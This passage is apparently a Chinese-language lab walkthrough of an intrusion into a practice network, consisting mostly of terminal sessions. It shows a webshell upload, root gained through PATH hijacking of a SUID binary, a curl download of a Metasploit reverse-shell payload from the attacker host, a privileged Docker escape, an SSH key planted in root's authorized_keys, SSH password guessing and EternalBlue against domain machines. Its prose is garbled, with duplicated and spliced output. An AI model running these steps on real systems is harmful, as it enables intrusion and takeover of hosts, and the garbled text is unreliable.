- [proxychains] config file found: /etc/proxychains4.conf
- [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
- [proxychains] DLL init: proxychains-ng 4.17
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [✅]检测到漏洞![🚩]url: http://192.168.52.20:8000 [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.52.20:8000 ... OK
- [OK] 成功写入webshell, 访问地址 http://192.168.52.20:8000/shell.php , 密码 whoami
- (www-data:/var/www/html) $ ip addr
- /bin/sh: 1: ip: not found
- (www-data:/var/www/html) $ ifconfig
- /bin/sh: 1: ifconfig: not found
为什么?
紧张基于几个 Docker 摆设时的典范特性:
- hostname 下令直接输出了 8e172820ac78 这个 12 位的十六进制字符串,这正是 Docker 在默认设置下会主动把容器 ID 的前 12 位设置为容器主机名的做法,在物理机大概平凡假造机上很少会碰到这种随机的短十六进制主机名
- /etc/hosts 文件里明确把 172.17.0.2 这个 IP 和主机名绑定在一起,而 172.17.0.0/16 网段是 Docker 默认 bridge 网络的尺度子网(容器通常会从 172.17.0.2 开始分配所在)
除上述指纹特性之外,着实另有一个最关键的证据,内核和利用体系版本的不匹配:/etc/os-release 和 /etc/issue 表现的是 Debian 10(buster),但 uname -a、/proc/version 表现的却是 Ubuntu 14.04 系列构建出来的 4.4.0-142-generic 内核。
容器是不会自带内核的,它会共用主机的内核,也就是说,这是一台:Debian 10 容器 + 宿主机 Ubuntu 系内核 4.4.0-142。
而且,检察历程:- (www-data:/var/www/html) $ hostname && cat /etc/issue && uname -a && cat /etc/hosts
- 8e172820ac78
- Debian GNU/Linux 10 \n \l
- Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019 x86_64 GNU/Linux
- 127.0.0.1 localhost
- ::1 localhost ip6-localhost ip6-loopback
- fe00::0 ip6-localnet
- ff00::0 ip6-mcastprefix
- ff02::1 ip6-allnodes
- ff02::2 ip6-allrouters
- 172.17.0.2 8e172820ac78
- (www-data:/var/www/html) $ cat /proc/version
- Linux version 4.4.0-142-generic (buildd@lcy01-amd64-006) (gcc version 4.8.4 (Ubuntu 4.8.4-2cat /etc/hostname1~14.04.4) ) #168~14.04.1-Ubuntu SMP Sat Jan 19 11:26:28 UTC 2019
- (www-data:/var/www/html) $ cat /etc/os-release
- PRETTY_NAME="Debian GNU/Linux 10 (buster)"
- NAME="Debian GNU/Linux"
- VERSION_ID="10"
- VERSION="10 (buster)"
- VERSION_CODENAME=buster
- ID=debian
- HOME_URL="https://www.debian.org/"
- SUPPORT_URL="https://www.debian.org/support"
- BUG_REPORT_URL="https://bugs.debian.org/"
平凡 Linux 主机的 PID 1 每每是 systemd、init 之类;容器里则常常是 sh、bash、apache2、nginx、php-fpm、python、业务启动脚本,大概一个很轻量的 supervisor。
3、权限提升
先实行一下容器内部提权。
检察用户有哪些 sudo 权限:- (www-data:/var/www/html) $ ps -p 1 -f
- UID PID PPID C STIME TTY TIME CMD
- root 1 0 0 00:38 ? 00:00:00 apache2 -DFOREGROUND
- (www-data:/var/www/html) $ (www-data:/var/www/html) $ ps -p 1 -f
- UID PID PPID C STIME TTY TIME CMD
- root 1 0 0 00:38 ? 00:00:00 apache2 -DFOREGROUNDWe trust you have received the usual lecture from the local SystemAdministrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility.sudo: no tty present and no askpass program specified
检察带 SUID 的文件:- (www-data:/var/www/html) $ sudo -l
- We trust you have received the usual lecture from the local System
- Administrator. It usually boils down to these three things:
- #1) Respect the privacy of others.
- #2) Think before you type.
- #3) With great power comes great responsibility.
- sudo: no tty present and no askpass program specified
- (www-data:/var/www/html) $ (www-data:/var/www/html) $ sudo -l
- We trust you have received the usual lecture from the local System
- Administrator. It usually boils down to these three things:
- #1) Respect the privacy of others.
- #2) Think before you type.
- #3) With great power comes great responsibility.
- sudo: no tty present and no askpass program specified 25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh 25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd 26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd 26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp 25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn 325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 (www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
- 25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
- 25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
- 26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
- 26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
- 25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
- 325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
- 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
- 25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
- 25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
- 25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount 25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount 25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su 25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
- (www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
- 25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
- 25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
- 26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
- 26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
- 25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
- 325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
- 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
- 25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
- 25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
- 25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
进入该目次,并检察目次下的文件:我们有来由推测,demo.c 就是 shell 编译前的容貌,检察:- (www-data:/var/www/html) $ cd /home/jobs
- (www-data:/home/jobs) $ ls
- demo.c
- shell
验证 shell 是否真的和我们所判定的一样,是 demo.c 编译后的版本,运行:- (www-data:/home/jobs) $ cat demo.c
- #include<unistd.h>
- void main()
- { setuid(0);
- setgid(0);
- system("ps");
- }
各人假如此处没输出可以多实行频频,这是 Webshell 固有的标题(缓存、时间限定等因素)。
查找可写目次:- (www-data:/home/jobs) $ ./shell
- PID TTY TIME CMD
- 1 ? 00:00:00 apache2
- 125 ? 00:00:00 shell
- 126 ? 00:00:00 sh
- 127 ? 00:00:00 ps
- (www-data:/home/jobs) $ (www-data:/home/jobs) $ ./shell
- PID TTY TIME CMD
- 1 ? 00:00:00 apache2
- 125 ? 00:00:00 shell
- 126 ? 00:00:00 sh
- 127 ? 00:00:00 psdev/fddev/fulldev/fusedev/mqueuedev/netdev/nulldev/ptmxdev/ptsdev/randomdev/shmdev/stderrdev/stdoutdev/ttydev/urandomdev/zerolib/systemdmsf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30/apache2msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30/locksys/fstmpvar/cachevar/lockvar/logvar/tmpvar/www
- (www-data:/home/jobs) $ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
- dev/fd
- dev/full
- dev/fuse
- dev/mqueue
- dev/net
- dev/null
- dev/ptmx
- dev/pts
- dev/random
- dev/shm
- dev/stderr
- dev/stdout
- dev/tty
- dev/urandom
- dev/zero
- lib/systemd
- run/apache2
- run/lock
- sys/fs
- tmp
- var/cache
- var/lock
- var/log
- var/tmp
- var/www
- (www-data:/home/jobs) $ printf '#!chroot /hack\nchroot /hack -c 'whoami'\n' > /tmp/ps
- (www-data:/home/jobs) $ chmod +x /tmp/ps
由于如今是 Webshell,无法反弹 root shell 返来,上面的只是在测试是否能通过 PATH 提权。
4、Meterpreter
Webshell 中无法直接实现交互式 root shell,筹划让其上线 MSF。
先创建反向署理,这须要在跳板机上修改 ssh server 的设置文件。
登入:- (www-data:/home/jobs) $ export PATH=/tmp:$PATH && ./shell
- root
- ssh -i target root@192.168.111.20
WP 篇幅较长,克制各人忘记,这里的 target 是私钥文件。
开启 MSF:- ssh -i target -D 1080 -N -C root@192.168.111.20
- exploit/multi/script/web_delivery
会得到一串 linux 下令(wget 开头),但是目的上并没有 wget 下令,颠末查抄发现,curl 是可以正常利用的,这个也可以用于下载文件:- set target Linux
- set payload linux/x64/meterpreter/reverse_tcp
- set LHOST 192.168.52.10
- set SRVPORT 6666
留意找到一个能写能改权限的目次。
下载乐成后,赋予权限:- cd /tmp && curl -O http://192.168.52.10:6666/XTUK5wgCV
- (www-data:/tmp) $ printf '#!chroot /hack\nchroot /hack -c '/tmp/XTUK5wgCV'\n' > /tmp/ps(www-data:/tmp) $ export PATH=/tmp:$PATH && (www-data:/var/www/html) $ find / -type f -perm -04000 -ls 2>/dev/null
- 25922 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
- 25969 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
- 26022 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
- 26012 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
- 25919 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
- 325013 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
- 325077 20 -rwsr-xr-x 1 root root 16712 Feb 25 2021 /home/jobs/shell
- 25400 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /bin/mount
- 25418 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /bin/su
- 25424 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /bin/umount
- (www-data:/tmp) $ printf '#!chroot /hack\nchroot /hack -c '/tmp/XTUK5wgCV'\n' > /tmp/ps
- (www-data:/tmp) $ export PATH=/tmp:$PATH && /home/jobs/shell
5、容器逃逸
容器内没啥有用的信息,实行容器逃逸。
最容易利用、也最容易想到的就是“Privileged Container Escape(特权容器逃逸)”
起首,确认容器是否为 Privileged 模式(逃逸条件):输出:- lsblk
- fdisk -l 2>/dev/null
- root@8e172820ac78:/tmp# lsblk
- lsblk
- NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
- sda 8:0 0 10G 0 disk
- |-sda1 8:1 0 8G 0 part /etc/hosts
- |-sda2 8:2 0 1K 0 part
- `-sda5 8:5 0 2G 0 part [SWAP]
- root@8e172820ac78:/tmp# fdisk -l 2>/dev/null
- fdisk -l 2>/dev/null
- Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
- Disk model: Virtual disk
- Units: sectors of 1 * 512 = 512 bytes
- Sector size (logical/physical): 512 bytes / 512 bytes
- I/O size (minimum/optimal): 512 bytes / 512 bytes
- Disklabel type: dos
- Disk identifier: 0x00063af9
- Device Boot Start End Sectors Size Id Type
- /dev/sda1 * 2048 16779263 16777216 8G 83 Linux
- /dev/sda2 16781310 20969471 4188162 2G 5 Extended
- /dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris
创建一个目次用于挂在宿主机的真实目次:表现:- root@8e172820ac78:/tmp# /dev/sda/dev/sdamkdir: cannot create directory '/hack': File exists
- mount root@8e172820ac78:/tmp# lsblk
- lsblk
- NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
- sda 8:0 0 10G 0 disk
- |-sda1 8:1 0 8G 0 part /etc/hosts
- |-sda2 8:2 0 1K 0 part
- `-sda5 8:5 0 2G 0 part [SWAP]
- root@8e172820ac78:/tmp# fdisk -l 2>/dev/null
- fdisk -l 2>/dev/null
- Disk /dev/sda: 10 GiB, 10737418240 bytes, 20971520 sectors
- Disk model: Virtual disk
- Units: sectors of 1 * 512 = 512 bytes
- Sector size (logical/physical): 512 bytes / 512 bytes
- I/O size (minimum/optimal): 512 bytes / 512 bytes
- Disklabel type: dos
- Disk identifier: 0x00063af9
- Device Boot Start End Sectors Size Id Type
- /dev/sda1 * 2048 16779263 16777216 8G 83 Linux
- /dev/sda2 16781310 20969471 4188162 2G 5 Extended
- /dev/sda5 16781312 20969471 4188160 2G 82 Linux swap / Solaris1 /hack
但是这么转换照旧比力贫苦,也容易出现标题,利用 chroot 更改目次:如许一来,/ 就酿成了 /hack。
切换宿主机 shell:验证是否切换乐成:输出:逃逸乐成,但是如今只是到达了文件体系的逃逸,网络层面照旧在容器内里,检察 ip addr 就知道了:5、获取宿主机的 root
之前扫描能得到主机开放了 22 端口,我们故技重施,写入 ssh 公钥,然后用 ssh 直接毗连靶机,如许就能得到完备的宿主机 root。
找到之宿世成的公钥,将内里的内容输出出来:- ❯ cat target.pub
- ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
- ❯ cat target.pub
- ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
- cat > /root/.ssh/authorized_keys /dev/nullChain INPUT (policy ACCEPT 2829 packets, 279K bytes) pkts bytes target prot opt in out source destination Chain FORWARD (policy DROP 0 packets, 0 bytes) pkts bytes target prot opt in out source destination 6009 13M DOCKER-USER all -- * * 0.0.0.0/0 0.0.0.0/0 6009 13M DOCKER-ISOLATION-STAGE-1 all -- * * 0.0.0.0/0 0.0.0.0/0 2591 7215K ACCEPT all -- * docker0 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED 179 10740 DOCKER all -- * docker0 0.0.0.0/0 0.0.0.0/0 3239 6271K ACCEPT all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- docker0 docker0 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED 0 0 DOCKER all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br-05384b1b0df2 br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED 0 0 DOCKER all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br-f0d07941b332 br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED 0 0 DOCKER all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br-1d665e13ee58 br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 Chain OUTPUT (policy ACCEPT 2050 packets, 181K bytes) pkts bytes target prot opt in out source destination Chain DOCKER (4 references) pkts bytes target prot opt in out source destination 179 10740 ACCEPT tcp -- !docker0 docker0 0.0.0.0/0 172.17.0.2 tcp dpt:80Chain DOCKER-ISOLATION-STAGE-1 (1 references) pkts bytes target prot opt in out source destination 3239 6271K DOCKER-ISOLATION-STAGE-2 all -- docker0 !docker0 0.0.0.0/0 0.0.0.0/0 0 0 DOCKER-ISOLATION-STAGE-2 all -- br-05384b1b0df2 !br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 0 0 DOCKER-ISOLATION-STAGE-2 all -- br-f0d07941b332 !br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 0 0 DOCKER-ISOLATION-STAGE-2 all -- br-1d665e13ee58 !br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 Chain DOCKER-ISOLATION-STAGE-2 (4 references) pkts bytes target prot opt in out source destination 0 0 DROP all -- * docker0 0.0.0.0/0 0.0.0.0/0 0 0 DROP all -- * br-05384b1b0df2 0.0.0.0/0 0.0.0.0/0 0 0 DROP all -- * br-f0d07941b332 0.0.0.0/0 0.0.0.0/0 0 0 DROP all -- * br-1d665e13ee58 0.0.0.0/0 0.0.0.0/0 3239 6271K RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 Chain DOCKER-USER (1 references) pkts bytes target prot opt in out source destination 6009 13M RETURN all -- * * 0.0.0.0/0 0.0.0.0/0 root@cat /etc/hostname:~# ufw status 2>/dev/nullStatus: inactiveroot@cat /etc/hostname:~# nft list ruleset 2>/dev/nullroot@cat /etc/hostname:~#
- cat > /root/.ssh/authorized_keys << 'EOF'
- ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
- EOF
- root@cat /etc/hostname:/tmp# ./fscan -h 192.168.93.0/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ // /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4start infoscan(icmp) Target 192.168.93.10 is alive(icmp) Target 192.168.93.20 is alive(icmp) Target 192.168.93.30 is alive(icmp) Target 192.168.93.40 is alive
- [*] Icmp alive hosts len is: 4192.168.93.10:8000 open192.168.93.30:88 open192.168.93.20:8080 open192.168.93.20:1081 open192.168.93.20:1080 open192.168.93.40:445 open192.168.93.30:445 open192.168.93.20:445 open192.168.93.40:139 open192.168.93.30:139 open192.168.93.20:139 open192.168.93.40:135 open192.168.93.30:135 open192.168.93.20:135 open192.168.93.10:22 open
- [*] alive ports len is: 15start vulscan
- [*] NetInfo
- [*]192.168.93.30 [->]DC [->]192.168.93.30[+] MS17-010 192.168.93.30 (Windows Server 2012 R2 Datacenter 9600) [+] MS17-010 192.168.93.40 (Windows 7 Professional 7601 Service Pack 1)
- [*] NetBios 192.168.93.30 [+] DC:DC.whoamianony.org Windows Server 2012 R2 Datacenter 9600[+] MS17-010 192.168.93.20 (Windows 7 Professional 7601 Service Pack 1)
- [*] NetBios 192.168.93.40 PC2.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] WebTitle http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公体系[+] InfoScan http://192.168.93.20:8080 [通达OA]
- [*] WebTitle http://192.168.93.10:8000 code:200 len:17474 title:Laravel[+] InfoScan http://192.168.93.10:8000 [Laravel] [+] PocScan http://192.168.93.20:8080 tongda-user-session-disclosure [+] PocScan http://192.168.93.10:8000 C:\Windows\system32>arp -a
- arp -a
- Interface: 192.168.52.30 --- 0xb
- Internet Address Physical Address Type
- 192.168.52.10 00-50-56-b1-f7-eb dynamic
- 192.168.52.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- Interface: 169.254.129.186 --- 0x16
- Internet Address Physical Address Type
- 169.254.255.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static
- 255.255.255.255 ff-ff-ff-ff-ff-ff static
- Interface: 192.168.93.20 --- 0x17
- Internet Address Physical Address Type
- 192.168.93.30 00-50-56-b1-03-a1 dynamic
- 192.168.93.40 00-50-56-b1-a1-a3 dynamic
- 192.168.93.255 ff-ff-ff-ff-ff-ff static
- 224.0.0.22 01-00-5e-00-00-16 static
- 224.0.0.252 01-00-5e-00-00-fc static 已完成 14/15 [-] ssh 192.168.93.10:22 root pass@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 14/15 [-] ssh 192.168.93.10:22 root 1 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 14/15 [-] ssh 192.168.93.10:22 root root111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 14/15 [-] ssh 192.168.93.10:22 root root@2019 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 14/15 [-] ssh 192.168.93.10:22 root 12345678 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 14/15 [-] ssh 192.168.93.10:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 15/15
- [*] 扫描竣事,耗时: 7m15.055664472s
域内的两台靶机都存在永恒之蓝毛病。
八、再回永恒之蓝
优先测试 192.168.93.30(域控),老样子利用(由于之前报告过利用方法,下面讲授会稍显大略)。
创建署理:- proxychains ssh -i target root@192.168.52.20
留意换个端口。
将 MSF 的全局署理换一个:- proxychains ssh -i target root@192.168.52.20 -vvv
但是,实行多次都没有乐成,换 192.168.93.40,直接得到 meterpreter:- debug1: send_pubkey_test: no mutual signature algorithm
- msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30 autoroute -s 192.168.93.0/24[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30 post/multi/manage/autoroute OPTION=value [...]
- [*] Adding a route to 192.168.93.0/255.255.255.0...[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.93.40
- [*] Use the -p option to list all active routes
- root@ubuntu:~# ip addr
- 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
- link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
- inet 127.0.0.1/8 scope host lo
- valid_lft forever preferred_lft forever
- inet6 ::1/128 scope host
- valid_lft forever preferred_lft forever
- 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
- link/ether 00:50:56:b1:7e:66 brd ff:ff:ff:ff:ff:ff
- inet 192.168.52.20/24 brd 192.168.52.255 scope global eth0
- valid_lft forever preferred_lft forever
- inet6 fe80::250:56ff:feb1:7e66/64 scope link
- valid_lft forever preferred_lft forever
- 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
- link/ether 00:50:56:b1:4a:b8 brd ff:ff:ff:ff:ff:ff
- inet 192.168.93.10/24 brd 192.168.93.255 scope global eth1
- valid_lft forever preferred_lft forever
- inet6 fe80::250:56ff:feb1:4ab8/64 scope link
- valid_lft forever preferred_lft forever
- 4: br-1d665e13ee58: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
- link/ether 02:42:a8:01:1e:34 brd ff:ff:ff:ff:ff:ff
- inet 172.20.0.1/16 brd 172.20.255.255 scope global br-1d665e13ee58
- valid_lft forever preferred_lft forever
- 5: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
- link/ether 02:42:29:fc:b3:bf brd ff:ff:ff:ff:ff:ff
- inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
- valid_lft forever preferred_lft forever
- inet6 fe80::42:29ff:fefc:b3bf/64 scope link
- valid_lft forever preferred_lft forever
- 6: br-f0d07941b332: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
- link/ether 02:42:08:d3:ed:3c brd ff:ff:ff:ff:ff:ff
- inet 172.19.0.1/16 brd 172.19.255.255 scope global br-f0d07941b332
- valid_lft forever preferred_lft forever
- 7: br-05384b1b0df2: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
- link/ether 02:42:77:1a:64:7a brd ff:ff:ff:ff:ff:ff
- inet 172.18.0.1/16 brd 172.18.255.255 scope global br-05384b1b0df2
- valid_lft forever preferred_lft forever
- 9: vetha18b54f@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
- link/ether ba:51:d0:c7:b2:be brd ff:ff:ff:ff:ff:ff
- inet6 fe80::b851:d0ff:fec7:b2be/64 scope link
- valid_lft forever preferred_lft forever
- root@ubuntu:~# ip route show
- default via 192.168.52.2 dev eth0
- 169.254.0.0/16 dev eth1 scope link metric 1000
- 172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1
- 172.18.0.0/16 dev br-05384b1b0df2 proto kernel scope link src 172.18.0.1
- 172.19.0.0/16 dev br-f0d07941b332 proto kernel scope link src 172.19.0.1
- 172.20.0.0/16 dev br-1d665e13ee58 proto kernel scope link src 172.20.0.1
